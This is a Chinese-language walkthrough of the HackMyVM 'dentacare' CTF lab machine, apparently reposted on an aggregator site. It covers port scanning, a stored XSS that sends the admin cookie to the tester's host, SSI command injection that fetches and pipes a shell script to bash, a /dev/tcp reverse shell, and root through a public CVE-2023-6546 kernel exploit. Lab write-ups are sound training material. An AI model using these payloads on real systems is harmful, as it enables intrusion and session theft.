dentacare - hackmyvm

2024-06-18 05:20
文章标签 hackmyvm dentacare

本文主要是介绍dentacare - hackmyvm,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

简介

靶机名称:dentacare

难度:中等

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=dentacare

本地环境

虚拟机:vitual box

靶场IP(dentacare):192.168.56.120

跳板机IP(windows 11):192.168.56.1 192.168.190.100

渗透机IP(kali):192.168.190.151

扫描

nmap起手

nmap -sT -p0- 192.168.56.120 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
nmap -sT -sV -sC -O -p$ports 192.168.56.120 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-17 02:52 EDT
Nmap scan report for 192.168.56.120
Host is up (0.00026s latency).PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
80/tcp   open  http    Werkzeug/3.0.2 Python/3.11.2
|_http-title: DentaCare Corporation
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.2 Python/3.11.2
|     Date: Mon, 17 Jun 2024 06:52:31 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 43069
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <title>DentaCare Corporation</title>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
|     <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,500,600,700" rel="stylesheet">
|     <link rel="stylesheet" href="../static/css/open-iconic-bootstrap.min.css">
|     <link rel="stylesheet" href="../static/css/animate.css">
|     <link rel="stylesheet" href="../static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="../static/css/owl.theme.default.min.css">
|     <link rel="stylesheet" href="../static/css/magnific-popup.css">
|     <link rel="stylesheet" href="../static/css/aos.css">
|     <lin
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.2 Python/3.11.2
|     Date: Mon, 17 Jun 2024 06:52:31 GMT
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|     Connection: close
|   RTSPRequest:
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
|_http-server-header: Werkzeug/3.0.2 Python/3.11.2
8000/tcp open  http    Apache httpd 2.4.57
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.57 (Debian)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.37
OS details: DD-WRT v24-sp2 (Linux 2.4.37)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.72 seconds

经典22和80。8000不知道什么东西,应该也是http服务,不过访问它需要一些条件。

http

8000端口无法访问。80是个牙医宣传主页,首先目录扫描一下:

feroxbuster -u http://192.168.56.120/ -t 20 -w $HVV_Tool/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt -C 500 -d 3

有两个值得注意的地址

image-20240617154155677

console真的是console,看来使用python跑的flask框架还忘关debug模式。但因为没有PIN码,所以也只能作罢。

image-20240617154255811

admin则无论怎样都是直接重定向回主页,真是诈骗。

XSS攻击

网站大多是静态网页,很多链接点了都没用,那就一个个框试过去。

然后在feedback栏目里面的post feedback有一个输入框。插入一个简单的xss试试。

image-20240617165252497

image-20240617165508694

好好,居然有效果。

直接插个反弹cookie的xss试试

<img src=x onerror="location.href='http://192.168.56.1:30000/?c='+ document.cookie">

等一会儿后就弹回来了。

image-20240617171712983

Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::30000
Ncat: Listening on 0.0.0.0:30000
Ncat: Connection from 192.168.56.120.
Ncat: Connection from 192.168.56.120:50326.
GET /?c=Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJEZW50YUNhcmUgQ29ycG9yYXRpb24gIiwiaWF0IjoxNzEyNTc0NTEyLCJleHAiOjE3NDQxMTA1MTIsImF1ZCI6ImRlbnRhY2FyZS5obXYiLCJzdWIiOiJoZWxwZGVza0BkZW50YWNhcmUuaG12IiwiR2l2ZW5OYW1lIjoiUGF0cmljayIsIlN1cm5hbWUiOiJQZXRpdCIsIkVtYWlsIjoiYWRtaW5AZGVudGFjYXJlLmhtdiIsIlJvbGUiOlsiQWRtaW5pc3RyYXRvciIsIlByb2plY3QgQWRtaW5pc3RyYXRvciJdfQ.FIMxmUCOL3a4ThN5z-7VDN8OxBK7W0krHlcVktAiZtx3KXSQsbno1q1MRUL9JMPTJeqoTr-bRL2KWyr5Kv7JnQ HTTP/1.1
Host: 192.168.56.1:30000
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9NCAT DEBUG: Closing fd 408.

拿着cookie测了一圈,/admin还是进不去的,8000端口倒是可以访问了。

image-20240617172102889

这个网页的运行逻辑是先随便输入一个字符串,然后302跳转到/patient_name.shtml,把刚才的字符串打印出来

image-20240617192244216

image-20240617192252546

和html不同,shtml在开启ssi功能的前提下是可以执行命令的。这里可以输入<!--#exec cmd="id"> -->验证一下

(bp里记得编码成url再打出去)

image-20240617193052494

喜闻乐见。赶紧做个shell出来

<!--#exec cmd="curl http://192.168.56.1:30000/shell.sh | bash"> -->

shell.sh中内容如下

bash -c "bash -i >& /dev/tcp/192.168.56.1/30001 0>&1"

本机起个监听,发送后即可得到shell

image-20240617195413485

提权

CVE-2023-6546

感觉以前也遇到过,总之靶机的内核版本完全符合CVE-2023-6546

www-data@dentacare:/tmp$ cat /proc/version
cat /proc/version
Linux version 6.1.0-18-amd64 (debian-kernel@lists.debian.org) (gcc-12 (Debian 12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01)

image-20240617200532407

项目https://github.com/YuriiCrimson/ExploitGSM可以进行该CVE的提权

将源码在本机上编译好后,直接上传靶机运行即可。

image-20240617200911161

然后靶机就打穿了……话说正常打法根本不是这样吧?!

user:ef2f3bab2950c28547e17d32f864f172

root:31b80e67e233ed342639f36b10ecb64d

这篇关于dentacare - hackmyvm的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1071404

相关文章

HackMyVM-Minimal

目录 信息收集 arp nmap nikto whatweb WEB web信息收集 gobuster 文件包含漏洞 提权 web信息收集 main方法 question_1 question_2 question_3 prize.txt 软连接 信息收集 arp ┌──(root?0x00)-[~/HackMyVM]└─# arp-s

【hackmyvm】 Animetronic靶机

靶机测试 arp-scanporturl枚举exiftool套中套passwordsudo 提权 ` arp-scan arp-scan 检测局域网中活动的主机 192.168.9.203 靶机IP地址 port 通过nmap扫描,获取目标主机的端口信息 ┌──(root㉿kali)-[/usr/share/seclists]└─# nmap -sT -sV

HackMyVM-Alzheimer

目录 信息收集 arp nmap FTP服务信息收集 匿名登陆 关键信息 knock WEB信息收集 信息收集 gobuster 目录爆破 ssh登录 提权 系统信息收集 提权 get root 信息收集 arp ┌──(root㉿0x00)-[~/HackMyVM]└─# arp-scan -lInterface: eth0, typ

HackMyVM-Hommie

目录 信息收集 arp nmap WEB web信息收集 dirsearch ftp tftp ssh连接 提权 系统信息收集 ssh提权 信息收集 arp ┌──(root㉿0x00)-[~/HackMyVM]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 08:00:27:77:ed:8

HackMyVM-BaseME

目录 信息收集 arp nmap WEB web信息收集 gobuster hydra 目录检索 ssh 提权 get user sudo base64提权 get root 信息收集 arp ┌─[root@parrot]─[~/HackMyVM]└──╼ #arp-scan -lInterface: enp0s3, type: EN10M

[HackMyVM]靶场Boxing

难度:Medium kali:192.168.56.104 靶机:192.168.56.143 端口扫描 ┌──(root㉿kali2)-[~/Desktop]└─# nmap 192.168.56.143Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-03 19:25 CSTNmap scan report for sta

[HackMyVM]靶场Pipy

难度:easy kali:192.168.56.104 靶机:192.168.56.141 端口扫描 ┌──(root㉿kali2)-[~/Desktop]└─# nmap 192.168.56.141 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-31 20:10 CSTNmap scan

[HackMyVM]靶场Crossbow

kali:192.168.56.104 靶机:192.168.56.136 端口扫描 # nmap 192.168.56.136 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-26 22:17 CSTNmap scan report for crossbow.hmv (192.168.56.136)Host

[HackMyVM]靶场 Liceo

kali:192.168.56.104 靶机:192.168.56.124      端口扫描 nmap 192.168.56.124 # nmap 192.168.56.124Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-22 10:56 CSTNmap scan report for 192.168.56.124Hos

[HackMyVM]靶场 Zon

kali:192.168.56.104 主机发现 arp-scan -l # arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/a